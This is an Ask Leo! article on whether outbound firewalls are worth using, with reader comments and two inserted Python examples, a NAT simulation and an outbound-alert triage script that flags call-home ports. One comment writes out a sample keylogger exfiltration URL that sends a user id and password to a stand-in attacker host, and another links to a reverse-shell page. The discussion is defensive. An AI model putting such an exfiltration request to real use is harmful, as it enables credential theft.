You have said that when an outbound firewall stops something it is already too late. But don’t you think outbound firewall might stop a key logger from at least sending logs to an email or remote computer? Or would it not?
A firewall with outbound detection can be of use, but you’ve captured my thoughts already: if it detects something, in a way it’s already too late: your machine is infected.
Let’s review what outbound firewalls are, why I rarely recommend them, and perhaps why your key logger wasn’t detected.
Firewalls
Firewalls protect you from certain classes of bad things out on the internet. The primary function of a firewall is to monitor traffic coming from the internet (inbound) and prevent bad stuff from reaching or affecting your computer.
Its job is to protect you from “them”, where “them” means the bad guys on the internet.
My article Do I need a firewall, and if so, what kind? has a good overview of firewalls in general, how they do what they do, and my recommended approach.
To summarize: my preference is to use a hardware device, such as a router with NAT (Network Address Translation) enabled. This does an incredibly effective job of hiding your computer from outside access. You can connect out, but outside computers cannot initiate a connection without you having explicitly configured your router to allow it.
Using a router also takes the burden of that work off your computer. In fact, a single router can act as a single effective inbound firewall for all computers connected behind it.
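To make the "you can connect out, but outside computers cannot initiate a connection" behaviour concrete, here is a small stateful NAT simulation. It is an added example, not Ask Leo!'s code; the hosts, ports and the VNC port forward are constructed for the demo (RFC 5737 documentation addresses).

```python
"""Stateful NAT simulation (added example; not Ask Leo!'s code).

Models the behaviour described above: a host behind a NAT router can open
connections out, and the router only delivers inbound packets that answer an
existing outbound connection or match an explicitly configured port forward.
All addresses are constructed RFC 5737 documentation values.
"""
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

Endpoint = Tuple[str, int]  # (ip address, port)

# Constructed sample hosts for the demo (TEST-NET ranges, not real machines).
PUBLIC_IP = "198.51.100.7"        # the router's internet-facing address
LAN_HOST = "192.168.1.10"         # the computer behind the router
REMOTE_WEB = "203.0.113.5"        # a web server the LAN host talks to
REMOTE_STRANGER = "203.0.113.99"  # an internet host probing the router


@dataclass
class Translation:
    """One active mapping: which LAN endpoint owns a public port, and for which peer."""
    lan: Endpoint
    remote: Endpoint


class NatRouter:
    def __init__(self, public_ip: str, first_port: int = 40000) -> None:
        self.public_ip = public_ip
        self._next_port = first_port
        self._table: Dict[int, Translation] = {}   # public port -> active mapping
        self._forwards: Dict[int, Endpoint] = {}   # public port -> LAN endpoint

    def add_port_forward(self, public_port: int, lan: Endpoint) -> None:
        """The explicit exception the article mentions: the owner opens a port."""
        self._forwards[public_port] = lan

    def outbound(self, src: Endpoint, dst: Endpoint) -> Endpoint:
        """A LAN host connects out: allocate a public port and record the mapping."""
        for port, tr in self._table.items():
            if tr.lan == src and tr.remote == dst:
                return (self.public_ip, port)      # reuse the existing mapping
        port = self._next_port
        self._next_port += 1
        self._table[port] = Translation(lan=src, remote=dst)
        return (self.public_ip, port)

    def inbound(self, src: Endpoint, dst_port: int) -> Optional[Endpoint]:
        """A packet arrives from the internet. Returns the LAN endpoint it is
        delivered to, or None when the router drops it as unsolicited."""
        tr = self._table.get(dst_port)
        if tr is not None and tr.remote == src:
            return tr.lan                          # reply to a connection we opened
        if dst_port in self._forwards:
            return self._forwards[dst_port]       # owner explicitly allowed this port
        return None                                # nobody asked for it: dropped


def demo() -> Dict[str, Optional[Endpoint]]:
    """Walk through the cases the article describes and return what reached the LAN."""
    nat = NatRouter(PUBLIC_IP)
    public_src = nat.outbound((LAN_HOST, 51000), (REMOTE_WEB, 443))
    results: Dict[str, Optional[Endpoint]] = {"public_src": public_src}
    # The web server's reply targets the mapped port and is forwarded inside.
    results["reply"] = nat.inbound((REMOTE_WEB, 443), public_src[1])
    # A stranger hitting that same public port is not the peer we spoke to: dropped.
    results["stranger_same_port"] = nat.inbound((REMOTE_STRANGER, 12345), public_src[1])
    # A stranger probing an arbitrary service port (VNC, 5900) is dropped...
    results["stranger_vnc"] = nat.inbound((REMOTE_STRANGER, 12345), 5900)
    # ...until the owner configures a port forward for it.
    nat.add_port_forward(5900, (LAN_HOST, 5900))
    results["stranger_vnc_after_forward"] = nat.inbound((REMOTE_STRANGER, 12345), 5900)
    return results


if __name__ == "__main__":
    for case, delivered in demo().items():
        print(f"{case:28s} -> {delivered if delivered else 'dropped'}")
```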
Outbound firewall
A traditional firewall monitors traffic heading toward your computer from the internet. An outbound firewall does just the opposite: it looks for threats originating on your computer attempting to connect out to the internet.
In a sense, it’s protecting “them” from you.
While it’s very generous of you to protect everyone else from your computer, the practical benefit is that it should block the connection and alert you when something suspicious is happening, so you can take corrective action.
Outbound firewall shortcomings
In my opinion, outbound firewalls have several shortcomings, both technical and conceptual.
It’s too late
As you pointed out, when an outbound firewall detects something malicious, it’s because your machine is already infected. Something in your inbound security failed, and your machine very likely has malware.
Of course, it’s nice to be alerted, but your inbound defenses – firewall and anti-malware scanners – should have already either prevented or detected the problem. With adequate inbound protection, an outbound firewall is mostly redundant.
It’s intrusive
Outbound firewalls are only practically available as a part of third-party software firewalls you install on your machine. That means these firewalls take up additional resources to do their job.
A router will give you the inbound protection you need without taking up any additional resources.
It’s frequently wrong
I’d say that the most common complaints about outbound firewalls are that they throw warning messages that are either incomprehensible or overly frequent, and that they don’t give enough information to make an informed decision about what action to take, if any.
Frequently, they simply report an outbound connection attempt, with little or no information beyond the remote IP address.
They often generate warnings arising from totally legitimate processes on the machine, accessing the internet for things like software updates, or even just the current time and date.
With too many errors, indecipherable messages and false positives, people tend to ignore all the warnings after a while, rendering the outbound firewall completely ineffective.
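The difference between an alert that carries only a remote address and one that says which program is connecting, from where, and on what port, is easy to show in code. The following is an added example, not Ask Leo!'s code: the allow-list, program paths, addresses and sample events are all constructed, and the IRC port range comes from a commenter on this page.

```python
"""Outbound-alert triage (added example; not Ask Leo!'s code).

Contrasts the kind of alert the article complains about (a remote address
and nothing else) with what an application-aware outbound policy can say:
which program is connecting, whether it runs from its expected folder, and
whether the port fits that program's normal job. Program names, folders,
addresses and the allow-list are constructed for this example.
"""
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple


@dataclass(frozen=True)
class OutboundEvent:
    process_path: str   # full path of the program opening the connection
    remote_ip: str
    remote_port: int
    protocol: str       # "tcp" or "udp"


@dataclass(frozen=True)
class Verdict:
    action: str         # "allow" or "alert"
    reason: str


# Constructed allow-list: expected install folder and the ports each program normally uses.
KNOWN_PROGRAMS: Dict[str, Tuple[str, Set[Tuple[str, int]]]] = {
    "svchost.exe": (r"c:\windows\system32", {("udp", 123), ("tcp", 80), ("tcp", 443)}),
    "firefox.exe": (r"c:\program files\mozilla firefox", {("tcp", 80), ("tcp", 443)}),
}

# IRC port range a commenter on this page mentions as a "call home" channel.
IRC_PORTS = set(range(6660, 6670))


def split_path(path: str) -> Tuple[str, str]:
    """Return (folder, file name), lower-cased, for a Windows-style path."""
    folder, _, name = path.lower().rpartition("\\")
    return folder, name


def ip_only_verdict(ev: OutboundEvent) -> Verdict:
    """What a naive outbound firewall shows: the same alert for every attempt,
    so the user cannot tell a time sync from a keylogger upload."""
    return Verdict("alert", f"connection attempt to {ev.remote_ip}:{ev.remote_port}")


def app_aware_verdict(ev: OutboundEvent) -> Verdict:
    """Decide using process identity and port, and explain the decision."""
    folder, name = split_path(ev.process_path)
    known = KNOWN_PROGRAMS.get(name)
    if known is None:
        if ev.remote_port in IRC_PORTS:
            return Verdict("alert", f"unknown program {name} opening IRC port {ev.remote_port}")
        return Verdict("alert", f"unknown program {name} in {folder} -> {ev.remote_ip}:{ev.remote_port}")
    expected_folder, usual_ports = known
    if folder != expected_folder:
        # A legitimate name running from the wrong folder is a classic impostor sign.
        return Verdict("alert", f"{name} running from unexpected folder {folder}")
    if (ev.protocol, ev.remote_port) in usual_ports:
        return Verdict("allow", f"{name}: normal {ev.protocol}/{ev.remote_port} traffic")
    return Verdict("alert", f"{name} using unusual port {ev.protocol}/{ev.remote_port}")


# Constructed sample events: a time sync, a browser page load, an impostor and a call-home.
SAMPLE_EVENTS: List[OutboundEvent] = [
    OutboundEvent(r"C:\Windows\System32\svchost.exe", "203.0.113.10", 123, "udp"),
    OutboundEvent(r"C:\Program Files\Mozilla Firefox\firefox.exe", "203.0.113.20", 443, "tcp"),
    OutboundEvent(r"C:\Users\Public\Downloads\svchost.exe", "203.0.113.30", 443, "tcp"),
    OutboundEvent(r"C:\Users\Public\AppData\updater.exe", "203.0.113.40", 6667, "tcp"),
]


def triage(events: List[OutboundEvent]) -> List[Tuple[str, str]]:
    """Return (action, reason) per event under the application-aware policy."""
    return [(v.action, v.reason) for v in map(app_aware_verdict, events)]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print("naive :", ip_only_verdict(ev).reason)
        v = app_aware_verdict(ev)
        print("aware :", v.action.upper(), "-", v.reason)
```

Only the last two events deserve the user's attention; the naive verdict cannot separate them from the first two.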
The case for an outbound firewall
Is there a case for an outgoing firewall at all?
Many experts will disagree with me and say they add a lot of value, and the issues I’ve raised are simply off target or overstated.
Yes, it can act as an additional warning system. If it’s not too intrusive, it might even be relatively benign.
But I remain of the opinion that if an outgoing firewall is, in fact, adding value, it’s because your incoming protection is inadequate. If you’re going to focus additional energy and resources on security, I’d much rather you focus on preventative solutions, rather than solutions that only kick in after something has happened.
Detecting your keylogger
Now, about your keylogger.
If it’s showing up in the system tray, I’m not sure I’d classify it as malware.
It’s open about what it’s doing and easily visible. A key logger isn’t of itself necessarily malware – there are many legitimate uses for the technology. Since it’s not behaving like malware, I’m not surprised it’s not detected as malware.
It also may not be reaching out to the internet. It may be storing the keystrokes it logs locally, or it may simply delay its upload of your activity until it’s collected a certain amount of data, or until some other time.
But let’s assume you did get infected by a truly malicious keylogger – one that was attempting to hide and send all your keystrokes to some overseas hacker in real time.
Well, at the risk of repeating myself too many times: it’s too late. Your machine has been compromised, and you can no longer trust it – and that includes trusting your firewall. Yes, your outbound firewall might block the transmission – or it might not. The malware could, in fact, include additional code to actually reconfigure your firewall to let the malware’s communication through.
This is almost worse than having no outbound protection at all. With the outbound firewall you might think you’re protected when in fact you are not. Without an outbound firewall, you know, and you know to focus your efforts on inbound protection to avoid the problem in the first place.
I know that others will disagree with me, and I’m sure there’ll be some compelling cases made in the comments.
But I remain unconvinced, and outbound firewalls are not something I use personally or generally advise.
Wow, that was quick. I see your point: if the computer is infected you can’t trust it, and that includes the firewall on it. Focus on prevention instead.
Btw, I installed the keylogger just to check what would happen if someone else did it on my machine. The paid version of the keylogger does have the option to hide it. The free version hides it temporarily. The name of the keylogger was in the mail. I suppose some keyloggers are legitimate commercial software and are specifically left out, because my antivirus didn’t even let me install another keylogger with similar functionality.
I believe that a software firewall is necessary; layered security is a must in this day and age, and a hardware firewall is not enough. Search for a blog called Melih and read his article on this point of view.
Do you have the direct link to that specific article? Because there’s like 64 of them (assuming I found the correct blog), and apparently I can’t make out which one it is without reading through ALL of them.
You do realize you’re asking a question of someone who commented eight years ago?
Ah! I do believe you’re right! The article was conveniently linked in the most recent newsletter. My bad for not checking the date :)
I have McAfee Desktop Firewall Enterprise edition. Every time a program on my computer tries to call its mother ship via ports 6660 to 6669, McAfee Desktop Firewall will prompt whether to allow or deny the outbound connection. McAfee Antivirus Enterprise edition didn’t block IRC either way. I think an outbound firewall is essential if you’re concerned about privacy.
I got infected with Virtualmonde, or Trojan Vundo, before. The McAfee antivirus couldn’t even totally get rid of this trojan. The McAfee Desktop Firewall came in handy until I got Malwarebytes Anti-Spyware, which totally got rid of all sorts of parasites on my desktop.
I have to agree that by the time an outgoing firewall alerts you of a problem, you already have one.
But in some cases, that is the first, and possibly the only, indication that you have the problem. As well, they are very handy at stopping malware downloaders.
Keep in mind that a software (in/outbound) firewall has to go through the header of EVERY SINGLE packet being sent AND received. This means it will require a variable amount of resources, depending on how you use your connection.
If you download/upload a lot of information (even if you unblocked the program), your software firewall must still spend CPU resources to read all those packet headers.
If you’re playing a game, downloading a movie, or even using your instant messenger, it will have to read EVERY SINGLE packet, going both in and out. You can expect at least 15-20% of your CPU to be used AT ALL TIMES for a heavy user.
Not to mention the fact that a user behind a NAT router (which provides inbound protection already) also running a software firewall (which provides inbound protection again, but this time using your computer’s resources) simply makes no sense.
A NAT router alone, though, takes care of the problem at its source, does it only once, and saves all the resources you so very much need from being wasted.
Leo’s philosophy is true: if it’s already on your computer, it should be assumed that it should be, and should be left just as that.
An alternative to this, if you are somewhere with an unmanaged network or if you are connecting to a place you don’t trust: Windows Firewall (which also only does inbound protection) will do pretty much the same job as your NAT router on the road. And, since it’s inbound only, it will use less than half of the resources your in/outbound firewall would require (5% CPU).
Does it read every packet, or only every program connecting to the internet?
-Leo
One exception! At the time this occurred I was 70 years old with no interest in pirating DVDs. I had purchased and installed DVD X Copy because in the advertising it sounded as if it could be used to make multiple copies of MY HOME RECORDED videos for family members. I was given a prerecorded DVD for Christmas and made the mistake of watching it on that computer. A program included on that DVD that was ostensibly a DVD player asked for permission to go out to the web. Innocently, I gave it that permission. It returned immediately with a trojan that deactivated X Copy, which I intended for a perfectly lawful purpose. Further, it destroyed all of my personal photo files on that computer. Without the outgoing firewall the damage would have been done and the cause would have been a complete mystery. Obviously, considering these vigilante tactics, I now have no sympathy for the DVD industry and their supposed problem with piracy. D.D.
I’m with Fred on this one.
Snip: “In some cases, that is the first, and possibly the only indication, that you have a problem.”
Too right, mate. If something does happen to get past your defences, what Leo is suggesting would let it do whatever the hell it likes without you ever knowing. Well, at least till the day you find that you’ve taken out a $250k loan in another country and some debt collectors want you to pay it back!
Leo:
SNIP: “Frequently, they’ll simply report a connection attempt to or from an IP address with little or no additional information.”
Google is your friend. (-: They usually tell you the process/program name, and which folder it’s in. A legitimate process name in the wrong folder is a virus. IP lookup/whois can also give you some good clues as to the status of any outgoing connection request. It pays to be vigilant.
But there’s an even better solution to this whole problem. Use Linux! (-: No need for FWs or AVs. End of story.
Thanks for all the great newsletters and articles Leo.
Well, an advanced user may find the software firewall helpful. Suppose you have set up your PC to be accessed via VNC through the Internet via your home NAT router by opening specific ports. The software firewall detects numerous connection attempts per minute on those open ports, giving you an opportunity to block them. Had it not been there, and had you not supplied a good password to VNC, you can imagine the consequences.
It becomes necessary in such cases but for the average user, yes being behind a NAT router with good browsing habits is sufficient.
Ravi.
Novice, any packet, whether the program is connected to the internet or not, will be checked by the software firewall (even though it might not be going out). The port number is located in the header of every packet. The file MUST be scanned in order to find out which program it relates to (something a software firewall must do).
Whether it’s set to check both incoming and outgoing packets or just one or the other is the only situation where you may see a difference; Windows Firewall only checks incoming connections, for example.
Leo’s way is the best/most practical way to do it. If you have a NAT router (which makes sure all unused ports are closed) and if you keep your system clean from the get-go (i.e. have decent virus protection; I recommend NOD32), then you never have to worry about “bad things trying to get out”, because “bad things” will never get on. In cases like this, an outbound firewall is totally redundant.
Several popular commercial software programs are (at least arguably) spyware – some versions of a very common media player have been mentioned for example. There was no option to tell it not to send a list of the files you played back to them. An outbound firewall can protect you from this. Many antivirus or antispyware programs will not detect popular commercial software (for fear of legal liability).
Regarding “it’s too late”.
Suppose a keylogger or trojan has already infected the computer. It’s no good, I agree. But the outbound firewall *prevented* this bad thing from sending out electronic payment system details, hence made the keylogger or trojan useless, as it never succeeds in completing its objective: sending data to its master.
|| But lets assume that you did get infected by a truly malicious key logger – one that was attempting to hide, and send all your keystrokes to some overseas hacker. Well, at the risk of repeating myself too many times: it’s too late. Your machine has been compromised, and you can no longer trust it; and that includes trusting your firewall. Yes, your outbound firewall might block the transmission – or it might not. The malware could, in fact, include additional code to actually reconfigure your firewall to let the malware’s communication through. It’s been done. ||
You are referring in this example to unknown vulnerable firewall software, but applying conclusions to outbound firewalls in general. Is that slyness or fortuity?
Why haven’t you said anything about outbound firewall software which is guarded by a Host Intrusion Prevention System (HIPS), which *prevents* malware from:
– injecting any code into the firewall;
– reconfiguring it;
– modifying the operating system in any other way in order to send data bypassing the outbound firewall.
Comodo Internet Security (CIS) is an example of such firewall software. Maybe there are some other firewall products out there which can do the same? Please inform me.
|| You have said that when an outbound firewall stops something it is already too late. But don’t you think outbound firewall might stop a key logger from at least sending logs to an email or remote computer? Or would it not? ||
You substituted “outbound firewall” for unknown leaky outbound firewall software. Why?
There are real-world outbound firewalls that don’t leak (I know one: CIS).
|| It’s intrusive. Outbound firewalls are only practically available as components of software firewalls that you install on your machine. As such, these firewalls take up additional resources to do their job. Rather than do that, a router will give you the inbound protection you need without taking up additional resources on your machine. ||
“Additional resources” is a subjective term. For example, what is better: spending the system’s additional resources (how many? :) ) OR saving resources, but risking infection with a trojan (a zero-day virus, which anti-virus won’t detect) that will leak your electronic payment system login & password?
|| It’s frequently wrong. …With too many errors, indecipherable messages or false positives, people tend to ignore the warnings after a while, rendering the outbound firewall ineffective. ||
In some cases *people* “tend to ignore the warnings…”. But what’s wrong with the outbound firewall? Lack of clarity etc. is subjective, not to say more. And it differs from user to user, from one firewall software to another.
|| Is there a case for an outgoing firewall at all? Many experts will disagree with me and say absolutely, that they add a lot of value and that the issues I’ve raised are simply off target or over-stated. But I remain of the opinion that if an outgoing firewall is, in fact, adding value it’s because your incoming protection is inadequate. ||
Many ordinary users may have their PC infected even with adequate incoming protection: a friend’s infected flash drive, an executable from a trusted source which in fact is malware, social engineering, malicious e-mail attachments.
What to do with those examples where people’s computers (those behind NAT or those that are part of closed enterprise networks) got infected from “inside”?
Anti-virus, anti-spyware and other signature-based detection software will NOT detect malicious executables (trojans, keyloggers) if they are zero-day viruses/malware (those viruses/malware for which specific antivirus software signatures are not yet available).
As a long-time member on Wilders Security and someone who is always testing security products with live malware, I am going to make a comment.
Regarding the “it’s too late” comment: it is not an outbound firewall’s job to prevent infection from happening in the first place. An outbound firewall is designed to do just that: police all outgoing traffic, not prevent the installation of malware.
Yes, it is possible for malware to bypass outbound firewalls. But I wouldn’t go as far as to say an outbound firewall is not needed. Going by that logic one could also argue that zero-day malware can also disable and bypass anti-virus programs, so therefore it is a waste of time using an anti-virus program as well.
While a router with NAT is good to have, a router with NAT alone will not save you from getting keyloggers, nor will it prevent the keylogger from making outgoing connections.
That said, a lot of software outbound firewalls are improving in strength; they have now added “Host Intrusion Prevention” components to prevent the infection/installation of malware.
To sum this up, it is better to have a layered security approach, i.e. NAT router, software firewall, AV, and a backed-up image of your OS, rather than just using a NAT router.
As a network consultant, my experience is that software firewalls cause much more trouble than they prevent. If a PC can’t connect to the network, can’t share resources, or has mysterious trouble connecting for some (but not all) purposes, quite often a software firewall is the culprit. It’s probably because a non-expert user has said “no” to the firewall’s prompt that something (legitimate) is trying to go in or out. Sorry, but it’s not the average user’s responsibility to be technical enough to manage a firewall.
Your major point, “it’s too late,” is flawed in at least one respect. While listening on an Incoming port generally requires Administrator access, Outgoing connections may generally be initiated by clients with User level access. If a non-administrative user were to run hostile code on the machine, it would have access to everything to which the user has access – including the ability to initiate outgoing connections; thus a backdoor with User-level access could be loaded on the infected machine and could connect back to a host machine and wait for commands. This serves as the sharp point of the wedge which can then be metaphorically driven into the infected machine through privilege escalation vulnerabilities. See this link:
http://www.plenz.com/reverseshell
I get your point, and agree with your logic, as I agree with the Catholic Church’s logic that condoms put people at risk of getting AIDS, (feel too safe and you may take risks you shouldn’t be taking).
I’m not convinced by your “It’s too late” argument. By the same standard, an AIDS test is not worth it, because once you’ve got AIDS, you’re dead. If you were infected, wouldn’t you want to know early on? If your password was stolen, wouldn’t you want to know about it so you can change it? And take corrective measures?
Even when I know that it’s not 100% secure, the outbound firewall makes me less paranoid, so I don’t have to be running TCPView and checking Windows Firewall’s advanced settings periodically.
I now use MSE and I’m mostly happy with it. However, I miss my old F-Prot’s outbound firewall because it let me know when a “legitimate” program was trying to connect without my knowledge for the first time (yes I’m a control freak when it comes to my PC). I once had MS Media Player change the cover & tags of all my mp3s, and spent more than a month fixing them, just because I forgot to set MSMP’s options right after an upgrade. I also had other programs do nasty stuff like that, or just connect and take my bandwidth without my knowledge.
Summarizing:
-I agree that an outbound firewall may be inconvenient or dangerous for the average user (similar to giving teenagers condoms and telling them to f**k at will).
-But they certainly have a use under certain circumstances and for certain users.
– I once read something about PC security being about securing several critical points. (http://ask-leo.com/internet_safety_how_do_i_keep_my_computer_safe_on_the_internet.html) Why is another security layer a bad idea?
PS: Is there a way to make Windows Firewall behave like these firewalls asking for permission for unknown programs trying to connect to the internet? I know you can manually block applications going in or out, but how about an “ask for permission”?
I wonder how an outbound firewall is going to tag an outbound HTTP connection to a remote machine on port 80. Suppose that my malicious key logger sits still on a machine until it gets “user id” and “passwd” when you connect to Citibank, say, and then quickly opens a connection to
http://malicious.hacker.io/dodo/?data1=123456&data2=mysecretpw ?
Typically an outbound firewall would be looking at more than just the port. For example that domain (malicious.hacker.io in your example) could be on a known black list, or its IP address could be.
In addition to Leo’s comments, and assuming you’re talking about a firewall that has an application-layer component, it’d be blocked from making any outgoing connections at all.
“Outbound firewalls are only practically available as a part of third-party software firewalls you install on your machine.” – That’s incorrect. Windows Firewall with Advanced Security enables very granular control over outbound connections.
“It’s too late.” – Not necessarily. For example, if a crypto/ransomware cannot establish a connection to its command and control servers, it cannot run its encryption routines.
Leo,
Apart from Windows DEFENDER, would you, or anyone else, suggest a firewall for Windows 10 to display/monitor OUTBOUND as well as inbound traffic, so I can see who my machine is trying to contact? tks&rgds
Windows Defender isn’t a firewall. The firewall built into Windows 10 provides additional options when used in “Advanced Security” mode:
https://technet.microsoft.com/en-us/library/cc754274.aspx
Most hardware firewalls can act as both inbound and outbound firewalls. I use a PIX 515E for my firewall and I can easily control both inbound and outbound connections. And, while it may be too late to stop the infection, it is certainly not too late to protect yourself a bit further. Anti-virus and anti-malware software are falling further and further behind the curve. Any added protection is certainly welcome in my book. Yes, it is a headache to have to add rules every time I add a new game or whatever to allow it to contact the Internet. But I’d much rather have the added headache than compromise my data, passwords, etc., etc. It’s not the perfect solution, but it does add an additional layer of protection. After all, there is a reason the PCI Council requires outbound as well as inbound filtering at the border. And I wholeheartedly agree software firewalls are mostly ineffective.
“It’s not the perfect solution but it does add an additional layer of protection.” – Yes, a properly configured firewall appliance does indeed provide an additional layer of protection. The problem is, however, that the average home user likely doesn’t have the know-how to be able to configure it properly. Additionally, if improperly configured, these devices can cause all sorts of network/connectivity problems – and troubleshooting those problems becomes more complex too.
Most folk are already behind a couple of firewalls: the one built into their router and the one built into Windows. I think that this combination is probably the best option for most home users: it strikes the right balance between security, convenience/ease of use and cost.
“And I wholeheartedly agree software firewalls are mostly ineffective.” – On the contrary, software firewalls – including the software firewall built into Windows – are very effective.
It’s not true that if an outgoing firewall detects something, “in a way it’s already too late: your machine is infected.” Your machine doesn’t have to be infected, but you may have known and useful software on your computer that decides to send out information without asking you. For example, what business does Adobe PDF Reader have to be sending out information from your computer, especially if you’ve turned off the auto-update feature? You’ll probably find that many freeware applications will send something out. The same goes with MS Office applications and Windows 10! Now an outgoing firewall can be essential to minimize Windows 10 mining data from your hard drive and sending it out to the mother ship.
I believe Leo was talking in terms of security.
“For example, what business does Adobe PDF Reader have to be sending out information from your computer, especially if you’ve turned off the auto-update feature?” – Could be any number of reasons, including the document pulling external content.
Really, if somebody has so little confidence in a company that they feel it necessary to block – or attempt to block, anyway – that company’s product from making external connections, then it’d be better to switch to a different company’s products.
Let me add an additional comment here:
“Now an outgoing firewall can be essential to minimize Windows 10 mining data from your hard drive and sending it out to the mother ship.” – How do you know that ZoneAlarm – or whatever firewall you use – isn’t “mining data from your hard drive and sending it out to the mother ship”? I can only assume that you trust the developer of the firewall more than you trust Microsoft – but this is a stance that really doesn’t make sense given that the firewall company will be subject to much less scrutiny than Microsoft: a company whose every move is put under the microscope by independent security researchers and regulators.
The bottom line is that you shouldn’t be using an application which you do not trust. Or an operating system.
Does turning off Windows Firewall or a software firewall put computers on the same router at risk? If two laptops are connected to the same WiFi, would the router’s firewall allow the infected laptop to communicate with the good laptop and spread a virus? Or can routers block malicious inside connections in addition to outside connections? Also, is it possible the infected laptop could connect through WiFi Direct to the good laptop and completely bypass any hardware firewall, without anybody realizing what’s happening? Even if my friend and I intended to connect using WiFi Direct to share files, then we would have no protection from each other, allowing the good file transfer but blocking the virus transfer.
A NAT firewall which is a feature of every router is generally sufficient to protect the computers against attacks from the outside. The danger is if one of the users on the local area network does something to invite a virus, for example, running an infected program. When that happens, it can put the other computers on the LAN in danger of infection so it can protect you from a computer on your local network. As the article states: “a single router can act as a single effective inbound firewall for all computers connected behind it.” Not having a software firewall in itself won’t endanger other machines.
Routers do not protect local machines from each other — only traffic that crosses the router to and from the internet is firewalled.
If you can’t trust a local machine for some reason, then yes, you want your local firewalls turned on. Fortunately that’s the default these days, and it doesn’t impact performance adversely.